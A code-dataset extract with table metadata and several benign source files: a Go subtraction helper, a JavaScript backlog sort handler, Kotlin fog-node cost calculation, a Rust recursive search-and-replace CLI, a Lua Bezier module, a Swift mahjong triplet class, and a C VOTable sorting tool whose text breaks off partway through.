hexsha
stringlengths 40
40
| size
int64 140
1.03M
| ext
stringclasses 94
values | lang
stringclasses 21
values | max_stars_repo_path
stringlengths 3
663
| max_stars_repo_name
stringlengths 4
120
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
sequencelengths 1
10
| max_stars_count
int64 1
368k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
663
| max_issues_repo_name
stringlengths 4
120
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
sequencelengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
663
| max_forks_repo_name
stringlengths 4
135
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
sequencelengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 140
1.03M
| avg_line_length
float64 2.32
23.1k
| max_line_length
int64 11
938k
| alphanum_fraction
float64 0.01
1
| score
float32 3
4.25
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a169a0c436e5ece742a17c7ea2ade0d5e3df729c | 1,546 | go | Go | math/subtract.go | buro9/funcs | 0a117fc83732c13b554d10e52d17997b113a3d2c | [
"MIT"
] | null | null | null | math/subtract.go | buro9/funcs | 0a117fc83732c13b554d10e52d17997b113a3d2c | [
"MIT"
] | null | null | null | math/subtract.go | buro9/funcs | 0a117fc83732c13b554d10e52d17997b113a3d2c | [
"MIT"
] | null | null | null | package math
// Subtract takes two numbers (a and b) and substracts b from a.
//
// The type of b will be cast to the same type as a.
func Subtract(a interface{}, b interface{}) interface{} {
switch av := a.(type) {
case float32:
switch bv := b.(type) {
case float32:
return av - bv
case float64:
return av - float32(bv)
case int:
return av - float32(bv)
case int32:
return av - float32(bv)
case int64:
return av - float32(bv)
default:
return nil
}
case float64:
switch bv := b.(type) {
case float32:
return av - float64(bv)
case float64:
return av - bv
case int:
return av - float64(bv)
case int32:
return av - float64(bv)
case int64:
return av - float64(bv)
default:
return nil
}
case int:
switch bv := b.(type) {
case float32:
return av - int(bv)
case float64:
return av - int(bv)
case int:
return av - bv
case int32:
return av - int(bv)
case int64:
return av - int(bv)
default:
return nil
}
case int32:
switch bv := b.(type) {
case float32:
return av - int32(bv)
case float64:
return av - int32(bv)
case int:
return av - int32(bv)
case int32:
return av - bv
case int64:
return av - int32(bv)
default:
return nil
}
case int64:
switch bv := b.(type) {
case float32:
return av - int64(bv)
case float64:
return av - int64(bv)
case int:
return av - int64(bv)
case int32:
return av - int64(bv)
case int64:
return av - bv
default:
return nil
}
default:
return nil
}
}
| 17.770115 | 64 | 0.613842 | 3.015625 |
bccec26a54de7338da918cc2ddbfc5c949498969 | 1,680 | js | JavaScript | server/src/commandHandlers/setSortOrder.js | sthagen/Zuehlke-poinz | c1514c03f4ba22b819eed8de8c5242eba4801067 | [
"MIT"
] | null | null | null | server/src/commandHandlers/setSortOrder.js | sthagen/Zuehlke-poinz | c1514c03f4ba22b819eed8de8c5242eba4801067 | [
"MIT"
] | null | null | null | server/src/commandHandlers/setSortOrder.js | sthagen/Zuehlke-poinz | c1514c03f4ba22b819eed8de8c5242eba4801067 | [
"MIT"
] | null | null | null | /**
* A user re-orders the backlog manually.
* This command will set the new sortOrder of all active stories in the room.
* Trashed stories will not be affected. (sortOrder = undefined).
*/
const schema = {
allOf: [
{
$ref: 'command'
},
{
properties: {
payload: {
type: 'object',
properties: {
sortOrder: {
// list of story-ids. Must contain all ids of all untrashed stories in room.
type: 'array',
items: {
type: 'string',
format: 'uuid'
}
}
},
required: ['sortOrder'],
additionalProperties: false
}
}
}
]
};
const setSortOrderCommandHandler = {
schema,
preCondition: (room, command) => {
const activeStoriesInRoom = room.stories.filter((s) => !s.trashed);
const sortOrderInCommand = [...new Set(command.payload.sortOrder)]; // remove any duplicates
if (activeStoriesInRoom.length !== sortOrderInCommand.length) {
throw new Error(
`Given sortOrder contains ${sortOrderInCommand.length} storyIds. However, we have ${activeStoriesInRoom.length} (untrashed) stories in our room!`
);
}
const allIdsInCommandPresentInRoom = sortOrderInCommand.every(
(storyId) => !!activeStoriesInRoom.find((s) => s.id === storyId)
);
if (!allIdsInCommandPresentInRoom) {
throw new Error('Given sortOrder contains storyIds that do not match stories in our room!');
}
},
fn: (pushEvent, room, command) => {
pushEvent('sortOrderSet', command.payload);
}
};
export default setSortOrderCommandHandler;
| 28.474576 | 153 | 0.597619 | 3.09375 |
e354583b87d12253c7b85983fa3a2a5d42e8df29 | 5,235 | kt | Kotlin | src/main/kotlin/emufog/fog/FogGraphBuilder.kt | emufog/emufog | d79defb13b203ef5bfb45c3396782516ade9338f | [
"MIT"
] | 22 | 2017-09-26T13:12:13.000Z | 2022-01-03T19:29:34.000Z | src/main/kotlin/emufog/fog/FogGraphBuilder.kt | emufog/emufog | d79defb13b203ef5bfb45c3396782516ade9338f | [
"MIT"
] | 49 | 2017-10-24T10:18:37.000Z | 2021-06-12T08:05:48.000Z | src/main/kotlin/emufog/fog/FogGraphBuilder.kt | emufog/emufog | d79defb13b203ef5bfb45c3396782516ade9338f | [
"MIT"
] | 9 | 2017-09-12T20:42:18.000Z | 2021-07-10T12:38:34.000Z | /*
* MIT License
*
* Copyright (c) 2020 emufog contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
package emufog.fog
import emufog.graph.AS
import emufog.graph.Edge
import emufog.graph.EdgeDeviceNode
import emufog.graph.Node
import emufog.util.Heap
import emufog.util.PriorityHeap
/**
* Calculates the shortest distances for every edge node in the graph with a device attached. Every [BaseNode] of the
* result contains a cost mapping for every edge node to the respective costs. If the costs of the connection exceeds
* the threshold the algorithm aborts.
*
* @param system system to calculate the distances for
* @param threshold cost function threshold to stop iterating
* @return a set of all the nodes that are within the threshold
*/
internal fun calculateShortestDistances(system: AS, threshold: Float): Set<BaseNode> {
return FogGraphBuilder(system, threshold).createFogGraph()
}
/**
* Calculates the costs for a given edge of the graph.
*
* @return costs of the given edge
*/
private fun Edge.getCosts(): Float {
// currently using latency as a cost function
return this.latency
}
/**
* Updates an element in the [Heap] instance. If the element is part of the heap its priority is updated.
*/
internal fun <T> Heap<T>.update(element: T) {
if (this.remove(element)) {
this.add(element)
}
}
private class FogGraphBuilder(private val system: AS, private val threshold: Float) {
private val nodes: MutableMap<Node, BaseNode> = HashMap()
internal fun createFogGraph(): Set<BaseNode> {
// map edge device nodes to their respective wrappers
val startingNodes = system.edgeNodes.filter { it.hasDevices() }.map { StartingNode(it) }
startingNodes.forEach { nodes[it.node] = it }
startingNodes.forEach { calculateConnectionCosts(it) }
return nodes.values.toSet()
}
/**
* Calculates the connection costs to all nodes that are within the cost threshold defined in the associated config
* [.config]. To calculate the costs the function uses the dijkstra algorithm starting from the given node.
*
* @param startingNode node to calculate the connection costs for
*/
private fun calculateConnectionCosts(startingNode: StartingNode) {
// push the starting node as a starting point in the queue
startingNode.setCosts(startingNode, 0F)
val heap = PriorityHeap(CostComparator(startingNode)).also { it.add(startingNode) }
// using the dijkstra algorithm to iterate the graph
while (!heap.isEmpty()) {
val current = heap.pop()
checkNotNull(current) { "The heap of the Dijkstra Algorithm is empty." }
val currentCosts = current.getCosts(startingNode)
checkNotNull(currentCosts) { "No costs associated with this node in the graph." }
// check all edges leaving the current node
current.node.edges
.filterNot { it.isCrossASEdge() }
.forEach { processEdge(it, heap, currentCosts, current, startingNode) }
}
}
private fun processEdge(
edge: Edge,
heap: Heap<BaseNode>,
currentCosts: Float,
current: BaseNode,
startingNode: StartingNode
) {
val neighbor = edge.getDestinationForSource(current.node)
// ignore host devices as they are not considered to be possible nodes
if (neighbor == null || neighbor is EdgeDeviceNode) {
return
}
// abort on costs above the threshold
val nextCosts = currentCosts + edge.getCosts()
if (nextCosts > threshold) {
return
}
val neighborNode = nodes.computeIfAbsent(neighbor) { BaseNode(it) }
val neighborCosts = neighborNode.getCosts(startingNode)
if (neighborCosts == null) {
// newly discovered node
neighborNode.setCosts(startingNode, nextCosts)
heap.add(neighborNode)
} else if (nextCosts < neighborCosts) {
// update an already discovered node
neighborNode.setCosts(startingNode, nextCosts)
heap.update(neighborNode)
}
}
}
| 38.211679 | 119 | 0.689589 | 3.109375 |
e9b5f638850c1691b66c9e46134fb7620231addc | 16,293 | rs | Rust | src/main.rs | kevin-logan/rsr | 90c60e989e3e369413e89ab241ffae7b3cdd4061 | [
"Apache-2.0"
] | null | null | null | src/main.rs | kevin-logan/rsr | 90c60e989e3e369413e89ab241ffae7b3cdd4061 | [
"Apache-2.0"
] | null | null | null | src/main.rs | kevin-logan/rsr | 90c60e989e3e369413e89ab241ffae7b3cdd4061 | [
"Apache-2.0"
] | null | null | null | macro_rules! info {
( $quiet:expr, $($args:expr),+ ) => {
if !($quiet) {
println!($($args),*);
}
}
}
struct StringReplacer {
search_expression: Option<regex::Regex>,
replace_pattern: Option<String>,
}
impl StringReplacer {
pub fn new(
search_expression: Option<regex::Regex>,
replace_pattern: Option<String>,
) -> StringReplacer {
match (search_expression, replace_pattern) {
// if no search but there is a replace we'll need a basic search
(None, Some(replace)) => StringReplacer {
search_expression: Some(
regex::Regex::new(".*").expect("Failed to compile simple '.*' expression"),
),
replace_pattern: Some(replace),
},
(search, replace) => StringReplacer {
search_expression: search,
replace_pattern: replace,
},
}
}
pub fn matches(&self, text: &str) -> bool {
match &self.search_expression {
Some(expression) => expression.is_match(text),
None => true,
}
}
pub fn has_search(&self) -> bool {
return self.search_expression.is_some();
}
pub fn has_replace(&self) -> bool {
return self.replace_pattern.is_some();
}
pub fn do_replace<'t>(&self, text: &'t str) -> std::borrow::Cow<'t, str> {
match &self.search_expression {
Some(search) => match &self.replace_pattern {
Some(replace) => search.replace_all(text, replace.as_str()),
None => std::borrow::Cow::from(text),
},
None => std::borrow::Cow::from(text),
}
}
}
struct RSRInstance {
filename_replacer: StringReplacer,
text_replacer: StringReplacer,
prompt: bool,
quiet: bool,
}
impl RSRInstance {
pub fn new(
filename_replacer: StringReplacer,
text_replacer: StringReplacer,
prompt: bool,
quiet: bool,
) -> RSRInstance {
RSRInstance {
filename_replacer,
text_replacer,
prompt,
quiet,
}
}
pub fn handle_directory(&self, directory: &std::path::Path) {
match directory.read_dir() {
Ok(iter) => {
for entry in iter {
if let Ok(entry) = entry {
let path = entry.path();
if let Ok(file_type) = entry.file_type() {
if file_type.is_dir() {
self.handle_directory(&path);
} else {
self.handle_file(&path);
}
} else {
info!(self.quiet, "Ignored {:?}, could not get file type", path);
}
} else {
info!(self.quiet, "Ignoring invalid entry within {:?}", directory);
}
}
}
Err(e) => info!(
self.quiet,
"Skipping {:?}, error iterating directory: {}", directory, e
),
}
}
fn handle_file(&self, file: &std::path::Path) {
if let Some(filename) = file.file_name() {
if let Some(filename) = filename.to_str() {
if self.filename_replacer.matches(&filename) {
let mut print_filename = true;
if self.text_replacer.has_replace() {
print_filename = false; // did something so no need to print filename
self.replace_file_contents(&filename, &file);
} else if self.text_replacer.has_search() {
print_filename = false; // did something so no need to print filename
self.search_file_contents(&file);
}
// do we need to rename?
if self.filename_replacer.has_replace() {
let new_filename = self.filename_replacer.do_replace(filename);
let new_path = file.with_file_name(new_filename.as_ref());
if new_path != file {
print_filename = false; // did something so no need to print filename
if self.confirm(&format!("Rename {:?} => {:?}?", file, new_path)) {
if let Err(e) = std::fs::rename(file, &new_path) {
println!(
"Failed to rename {:?} to {:?}: {}!",
file, new_path, e
);
};
}
}
}
// if we didn't do text search or a rename it's just file match
if print_filename {
info!(self.quiet, "{}", file.to_string_lossy());
}
}
} else {
info!(
self.quiet,
"Skipping {:?} as the the filename could not be parsed", file
);
}
} else {
info!(self.quiet, "Skipping {:?} as the it had no filename", file);
}
}
fn replace_file_contents(&self, input_filename: &str, input_path: &std::path::Path) {
let mut read_option = std::fs::OpenOptions::new();
read_option.read(true);
if let Ok(input_file) = read_option.open(&input_path) {
let tmp_file = input_path.with_file_name(input_filename.to_owned() + ".rsr_tmp");
let mut write_option = std::fs::OpenOptions::new();
write_option.write(true).create_new(true);
match write_option.open(&tmp_file) {
Ok(output_file) => {
use std::io::{BufRead, Write};
let mut reader = std::io::BufReader::new(input_file);
let mut writer = std::io::BufWriter::new(output_file);
let mut line_number = 1;
loop {
line_number += 1; // starts at zero so increment first
let mut line = String::new();
match reader.read_line(&mut line) {
Ok(count) => {
// 0 count indicates we've read everything
if count == 0 {
break;
}
let new_line = self.text_replacer.do_replace(&line);
let result = if new_line != line
&& self.confirm(&format!(
"{}:{}\n\t{}\n\t=>\n\t{}",
input_path.to_string_lossy(),
line_number,
line.trim(),
new_line.trim()
)) {
writer.write_all(new_line.as_bytes())
} else {
writer.write_all(line.as_bytes())
};
if let Err(e) = result {
// this is actually an error, print regardless of quiet level
println!(
"Skipping {:?} as not all lines could be written to {:?}: {}",
input_path, tmp_file, e
);
std::fs::remove_file(tmp_file).unwrap_or(()); // we don't care if the remove fails
return;
}
}
Err(e) => {
// this is actually an error, print regardless of quiet level
println!(
"Skipping {:?} as not all lines could be read: {}",
input_path, e
);
std::fs::remove_file(tmp_file).unwrap_or(()); // we don't care if the remove fails
return;
}
}
}
// if we got here we've successfully read and written everything, close the files and rename the temp
drop(reader);
drop(writer);
if let Ok(old_metadata) = std::fs::metadata(&input_path) {
if let Err(e) =
std::fs::set_permissions(&tmp_file, old_metadata.permissions())
{
println!("Failed to match permissions for {:?}, permissions may have changed: {}", input_path, e);
}
}
if let Err(e) = std::fs::rename(&tmp_file, &input_path) {
// this is actually an error, print regardless of quiet level
println!(
"Failed to rename temporary file {:?} to original file {:?}: {}",
tmp_file, input_path, e
);
}
}
Err(e) => {
// this is actually an error, print regardless of quiet level
println!(
"Skipping {:?} as the the temporary file {:?} could not be opened: {}",
input_path, tmp_file, e
);
}
}
} else {
info!(
self.quiet,
"Skipping {:?} as the the file could not be opened", input_path
);
}
}
fn search_file_contents(&self, input_path: &std::path::Path) {
let mut read_option = std::fs::OpenOptions::new();
read_option.read(true);
if let Ok(input_file) = read_option.open(&input_path) {
use std::io::BufRead;
let mut reader = std::io::BufReader::new(input_file);
let mut line_number = 0;
loop {
line_number += 1; // starts at zero so increment first
let mut line = String::new();
match reader.read_line(&mut line) {
Ok(count) => {
// 0 count indicates we've read everything
if count == 0 {
break;
}
if self.text_replacer.matches(&line) {
info!(
self.quiet,
"{}:{: <8}{}",
input_path.to_string_lossy(),
line_number,
line.trim()
);
}
}
Err(e) => {
// this is actually an error, print regardless of quiet level
println!(
"Skipping {:?} as not all lines could be read: {}",
input_path, e
);
return;
}
}
}
// if we got here we've successfully read and written everything, close the files and rename the temp
drop(reader);
} else {
info!(
self.quiet,
"Skipping {:?} as the the file could not be opened", input_path
);
}
}
fn confirm(&self, message: &str) -> bool {
match self.prompt {
true => {
println!("{} ... Confirm [y/N]: ", message);
let mut user_response = String::new();
match std::io::stdin().read_line(&mut user_response) {
Ok(_) => user_response.trim() == "y",
Err(_) => false,
}
}
false => true,
}
}
}
fn main() {
let args = clap::App::new("Recursive Search & Replace")
.version("0.1.0")
.about("A Recursive Search & Replace program which can find all files matching a pattern and find matches of another pattern in those files and potentially replace those as well")
.author("Kevin Logan")
.arg(clap::Arg::with_name("input")
.short("i")
.long("input")
.required(false)
.help("A regex pattern to filter files which will be included")
.takes_value(true))
.arg(clap::Arg::with_name("output")
.short("o")
.long("output")
.required(false)
.help("A replacement pattern to be applied to <input> (or '.*' if <input> is not provided) to produce the output filename")
.takes_value(true))
.arg(clap::Arg::with_name("search")
.short("s")
.long("search")
.required(false)
.help("A regex pattern for text to search for in the searched files")
.takes_value(true))
.arg(clap::Arg::with_name("replace")
.short("r")
.long("replace")
.required(false)
.help("A replacement pattern to replace any matching text with again <search>. May include references to capture groups, e.g. ${1} or named capture groups like ${name} which would be captured as (?P<name>.*). The curly-brackets are optional but may be required to distinguish between the capture and the rest of the replacement text")
.takes_value(true))
.arg(clap::Arg::with_name("prompt")
.short("p")
.long("prompt")
.required(false)
.help("If set, a y/N prompt will allow the user to decide if each instance of the found text should be replaced. Only relevant if <replace_pattern> is used")
.takes_value(false))
.arg(clap::Arg::with_name("quiet")
.short("q")
.long("quiet")
.required(false)
.help("If set, supresses any messages that are neither required nor errors")
.takes_value(false))
.arg(clap::Arg::with_name("dir")
.required(false)
.index(1)
.help("The directory to search for files within"))
.get_matches();
let dir = match args.value_of("dir") {
Some(value) => std::path::Path::new(value),
None => std::path::Path::new("."),
};
let input = match args.value_of("input") {
Some(pattern) => match regex::Regex::new(&pattern) {
Ok(regex) => Some(regex),
Err(e) => {
println!("Failed to compile regex {}: {}", pattern, e);
None
}
},
None => None,
};
let output = match args.value_of("output") {
Some(value) => Some(String::from(value)),
None => None,
};
let search = match args.value_of("search") {
Some(pattern) => match regex::Regex::new(&pattern) {
Ok(regex) => Some(regex),
Err(e) => {
println!("Failed to compile regex {}: {}", pattern, e);
None
}
},
None => None,
};
let replace = match args.value_of("replace") {
Some(value) => Some(String::from(value)),
None => None,
};
let prompt = args.is_present("prompt");
let quiet = args.is_present("quiet");
let filename_replace = StringReplacer::new(input, output);
let text_replace = StringReplacer::new(search, replace);
let instance = RSRInstance::new(filename_replace, text_replace, prompt, quiet);
instance.handle_directory(dir);
}
| 39.546117 | 346 | 0.441478 | 3.09375 |
be9c86117e2bee0b2ff8397846e5c55bde8f50a0 | 3,730 | lua | Lua | Data/Scripts/Bezier.lua | Core-Team-META/CC-Cinematic-Shot | 94f66c69c1a9781893de368dc9ced0c70a81544a | [
"Apache-2.0"
] | null | null | null | Data/Scripts/Bezier.lua | Core-Team-META/CC-Cinematic-Shot | 94f66c69c1a9781893de368dc9ced0c70a81544a | [
"Apache-2.0"
] | null | null | null | Data/Scripts/Bezier.lua | Core-Team-META/CC-Cinematic-Shot | 94f66c69c1a9781893de368dc9ced0c70a81544a | [
"Apache-2.0"
] | null | null | null | -- Bezier.lua
-- An instancable class allowing for a curve to be created and drawn in relation to X number of reference points
-- Created by Nicholas Foreman (https://www.coregames.com/user/f9df3457225741c89209f6d484d0eba8)
local BezierPointTemplate = script:GetCustomProperty("BezierPoint")
local BezierSegmentTemplate = script:GetCustomProperty("BezierSegment")
local Module = {}
local function lerp(a, b, c)
return a + (b - a) * c
end
function Module.New(references, numberOfSegments)
local self = setmetatable({}, {__index = Module})
self._object = true
self:Calculate(references, numberOfSegments)
return self
end
function Module.ClearChildren(parent)
for _, child in pairs(parent:GetChildren()) do
child:Destroy()
end
end
function Module:Calculate(references, numberOfSegments)
self.numberOfSegments = numberOfSegments
self.references = references
self.sum, self.standardPositions, self.sums = self:GetStandardPositions()
self.percentPositions = self:GetPercentPositions()
end
function Module:GetReferencesPositions()
assert(self._object, "Must be an object")
local positions = {}
for _, point in ipairs(self.references:GetChildren()) do
table.insert(positions, point:GetWorldPosition())
end
return positions
end
function Module:GetStandardPositions()
assert(self._object, "Must be an object")
local referencePositions = self:GetReferencesPositions()
local sum, ranges, sums = 0, {}, {}
for number = 0, self.numberOfSegments do
local percent = (number / self.numberOfSegments)
local nextPercent = ((number + 1) / self.numberOfSegments)
local position1 = self:GetPosition(percent, referencePositions)
local position2 = self:GetPosition(nextPercent, referencePositions)
local distance = (position2 - position1).size
ranges[sum] = {distance, position1, position2}
table.insert(sums, sum)
sum = sum + distance
end
return sum, ranges, sums
end
function Module:GetPercentPositions()
assert(self._object, "Must be an object")
local sum, standardPositions, sums = self.sum, self.standardPositions, self.sums
local percentPositions = {}
for number = 0, self.numberOfSegments - 1 do
local t = number / self.numberOfSegments
local T, near = t * sum, 0
for _, n in next, sums do
if (T - n) < 0 then break end
near = n
end
local set = standardPositions[near]
local percent = (T - near)/set[1]
table.insert(percentPositions, set[2] + (set[3] - set[2]) * percent)
end
return percentPositions
end
function Module:GetPosition(percent, points)
assert(self._object, "Must be an object")
local obtainedPoints = {}
for index = 1, (#points - 1) do
local point1, point2 = points[index], points[index + 1]
local obtainedPoint = lerp(point1, point2, percent)
table.insert(obtainedPoints, obtainedPoint)
end
local point
if(#obtainedPoints == 2) then
point = lerp(obtainedPoints[1], obtainedPoints[2], percent)
else
point = self:GetPosition(percent, obtainedPoints)
end
return point
end
function Module:DrawPoints(parent)
assert(self._object, "Must be an object")
Module.ClearChildren(parent)
for index, position in pairs(self.standardPositions) do
local pointToDraw = World.SpawnAsset(BezierPointTemplate, {parent = parent})
pointToDraw:SetWorldPosition(position[2])
pointToDraw.name = tostring(CoreMath.Round(index / self.sum, 2))
end
end
function Module:DrawPointsPercent(parent)
assert(self._object, "Must be an object")
Module.ClearChildren(parent)
for index, position in pairs(self.percentPositions) do
local pointToDraw = World.SpawnAsset(BezierPointTemplate, {parent = parent})
pointToDraw:SetWorldPosition(position)
pointToDraw.name = tostring(index / #self.percentPositions)
end
end
return Module | 26.834532 | 112 | 0.753083 | 3.265625 |
6d00c97df6457cd670efbf57968faee7f9667864 | 1,822 | swift | Swift | JongHelper/JongHelper/Solver/Mentu/Solver_Kotsu.swift | jphacks/SD_1702 | aaa533930e2d1c3836e80382b3ea51ec90a6b177 | [
"MIT"
] | 13 | 2017-11-01T20:15:18.000Z | 2022-01-15T18:11:33.000Z | JongHelper/JongHelper/Solver/Mentu/Solver_Kotsu.swift | jphacks/SD_1702 | aaa533930e2d1c3836e80382b3ea51ec90a6b177 | [
"MIT"
] | null | null | null | JongHelper/JongHelper/Solver/Mentu/Solver_Kotsu.swift | jphacks/SD_1702 | aaa533930e2d1c3836e80382b3ea51ec90a6b177 | [
"MIT"
] | 6 | 2017-10-27T14:58:02.000Z | 2021-08-11T13:58:41.000Z | //
// Kotu.swift
//
//
// Created by oike toshiyuki on 2017/10/17.
//
import Foundation
class Kotu: Mentu, Equatable, Comparable{
var isOpen = false
var isMentu = false
//順子はどっかしら決めて持っとく
var identifierTile: Tile
init() {
self.identifierTile = Tile.null
self.isOpen = false
self.isMentu = false
}
init(isOpen: Bool, identifierTile: Tile) {
self.identifierTile = identifierTile
self.isOpen = isOpen
self.isMentu = true
}
init(isOpen: Bool, tile1: Tile, tile2: Tile, tile3: Tile) {
self.isOpen = isOpen
self.isMentu = Kotu.check(tile1: tile1, tile2: tile2, tile3: tile3)
if (self.isMentu) {
identifierTile = tile1
} else {
identifierTile = Tile(rawValue: -1)!
}
}
class func check(tile1: Tile, tile2: Tile, tile3: Tile) -> Bool {
return tile1 == tile2 && tile2 == tile3
}
func getFu() -> Int {
var mentuFu = 2
if (!isOpen) {
mentuFu *= 2
}
if (identifierTile.isYaochu()) {
mentuFu *= 2
}
return mentuFu
}
static func <(lhs: Kotu, rhs: Kotu) -> Bool {
if Int(lhs.identifierTile.rawValue) < Int(rhs.identifierTile.rawValue) {
return true
}
return false
}
static func ==(lhs: Kotu, rhs: Kotu) -> Bool {
return (lhs.isOpen == rhs.isOpen) && (lhs.isMentu == rhs.isMentu) && (lhs.identifierTile == rhs.identifierTile)
}
func hashCode() -> Int {
var result: Int = identifierTile.getCode() != -1 ? identifierTile.hashValue : 0
result = 31 * result + (isMentu ? 1 : 0)
result = 31 * result + (isOpen ? 1 : 0)
return result
}
}
| 24.621622 | 119 | 0.537322 | 3.359375 |
12945e83bc635180a7cd831333b79ac23fb0ba8e | 12,664 | c | C | voapps/votsort.c | olebole/voclient | abeee7783f4e84404a8c3a9646bb57f48988b24a | [
"MIT"
] | 2 | 2019-12-01T15:19:09.000Z | 2019-12-02T16:48:42.000Z | voapps/votsort.c | mjfitzpatrick/voclient | 3264c0df294cecc518e5c6a7e6b2aba3f1c76373 | [
"MIT"
] | 1 | 2019-11-30T13:48:50.000Z | 2019-12-02T19:40:25.000Z | voapps/votsort.c | mjfitzpatrick/voclient | 3264c0df294cecc518e5c6a7e6b2aba3f1c76373 | [
"MIT"
] | null | null | null | /*
* VOTSORT -- Sort a VOTable based on a column value.
*
* Usage:
* votsort [<otps>] <votable.xml>
*
* Where
* -c,--col <N> Sort column num
* -d,--desc Sort in descending order
* -f,--fmt <format> Output format
* -o,--output <name> Output name
* -s,--string String sort
* -t,--top <N> Print top <N> rows
* -i,--indent <N> XML indent level
* -n,--noheader Suppress header
* -N,--name <name> Find <name> column
* -I,--id <id> Find <id> column
* -U,--ucd <ucd> Find <ucd> column
*
* -h,--help This message
* -r,--return Return result
* -%,--test Run unit tests
*
* @file votsort.c
* @author Mike Fitzpatrick
* @date 6/03/12
*
* @brief Sort a VOTable based on a column.
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include "votParse.h" /* keep these in order! */
#include "voApps.h"
static int do_return = 0; /* return result? */
static int sort_order = 1; /* ascending order */
static int top = 0; /* top results (0 for all) */
/* A result buffer should be defined to point to the result object if it is
* created dynamically, e.g. a list of votable columns. The task is
* responsible for initially allocating this pointer and then resizing as
* needed.
*/
#ifdef USE_RESBUF
#define SZ_RESBUF 8192
static char *resbuf;
#endif
/* Task specific option declarations. Task options are declared using the
* getopt_long(3) syntax.
*/
int votsort (int argc, char **argv, size_t *len, void **result);
static Task self = { "votsort", votsort, 0, 0, 0 };
static char *opts = "%:c:df:hi:LnN:I:U:o:rst:";
static struct option long_opts[] = {
{ "col", 1, 0, 'c'}, /* sort column num */
{ "desc", 2, 0, 'd'}, /* sort in descending order */
{ "fmt", 1, 0, 'f'}, /* output format */
{ "output", 1, 0, 'o'}, /* output name */
{ "string", 2, 0, 's'}, /* string sort */
{ "top", 1, 0, 't'}, /* string sort */
{ "indent", 1, 0, 'i'}, /* xml indent level */
{ "noheader", 2, 0, 'n'}, /* suppress header */
{ "name", 1, 0, 'N'}, /* find <name> column */
{ "id", 1, 0, 'I'}, /* find <id> column */
{ "ucd", 1, 0, 'U'}, /* find <ucd> column */
{ "help", 2, 0, 'h'}, /* --help is std */
{ "return", 2, 0, 'r'}, /* --return is std */
{ "test", 1, 0, '%'}, /* --test is std */
{ NULL, 0, 0, 0 }
};
/* All tasks should declare a static Usage() method to print the help
* text in response to a '-h' or '--help' flag. The help text should
* include a usage summary, a description of options, and some examples.
*/
static void Usage (void);
static void Tests (char *input);
extern int vot_isNumericField (handle_t field);
extern int vot_isValidFormat (char *fmt);
extern int vot_atoi (char *val);
extern int strdic (char *in_str, char *out_str, int maxchars, char *dict);
/**
* Application entry point. All VOApps tasks MUST contain this
* method signature.
*/
int
votsort (int argc, char **argv, size_t *reslen, void **result)
{
/* These declarations are required for the VOApps param interface.
*/
char **pargv, optval[SZ_FNAME], format[SZ_FORMAT];
char *iname, *oname, *fmt = NULL;
char *byName = NULL, *byID = NULL, *byUCD = NULL;
int i = 0, ch = 0, status = OK, pos = 0, col = -1, do_string = 0;
int vot, res, tab, data, tdata, field, tr;
int indent = 0, scalar = 0, hdr = 1;
/* Initialize result object whether we return an object or not.
*/
*reslen = 0;
*result = NULL;
/* Initialize local task values.
*/
iname = NULL;
oname = NULL;
/* Parse the argument list. The use of vo_paramInit() is required to
* rewrite the argv[] strings in a way vo_paramNext() can be used to
* parse them. The programmatic interface allows "param=value" to
* be passed in, but the getopt_long() interface requires these to
* be written as "--param=value" so they are not confused with
* positional parameters (i.e. any param w/out a leading '-').
*/
pargv = vo_paramInit (argc, argv, opts, long_opts);
while ((ch = vo_paramNext(opts,long_opts,argc,pargv,optval,&pos)) != 0) {
if (ch > 0) {
/* If the 'ch' value is > 0 we are parsing a single letter
* flag as defined in the 'opts string.
*/
switch (ch) {
case '%': Tests (optval); return (self.nfail);
case 'h': Usage (); return (OK);
case 'c': col = vot_atoi (optval); break;
case 'd': sort_order = -1; break;
case 'f': if (!vot_isValidFormat ((fmt = strdup (optval)))) {
fprintf (stderr, "Error: invalid format '%s'\n",
fmt);
return (ERR);
}
break;
case 'o': oname = strdup (optval); break;
case 'i': indent = vot_atoi (optval); break;
case 'n': hdr=0; break;
case 'N': byName = strdup (optval); break;
case 'I': byID = strdup (optval); break;
case 'U': byUCD = strdup (optval); break;
case 'r': do_return = 1; break;
case 's': do_string = 1; break;
case 't': top = vot_atoi (optval); break;
default:
fprintf (stderr, "Invalid option '%s'\n", optval);
return (1);
}
} else if (ch == PARG_ERR) {
return (ERR);
} else {
/* This code processes the positional arguments. The 'optval'
* string contains the value but since this string is
* overwritten w/ each arch we need to make a copy (and must
* remember to free it later).
*/
iname = strdup (optval);
break; /* only allow one file */
}
}
/* Sanity checks. Tasks should validate input and accept stdin/stdout
* where it makes sense.
*/
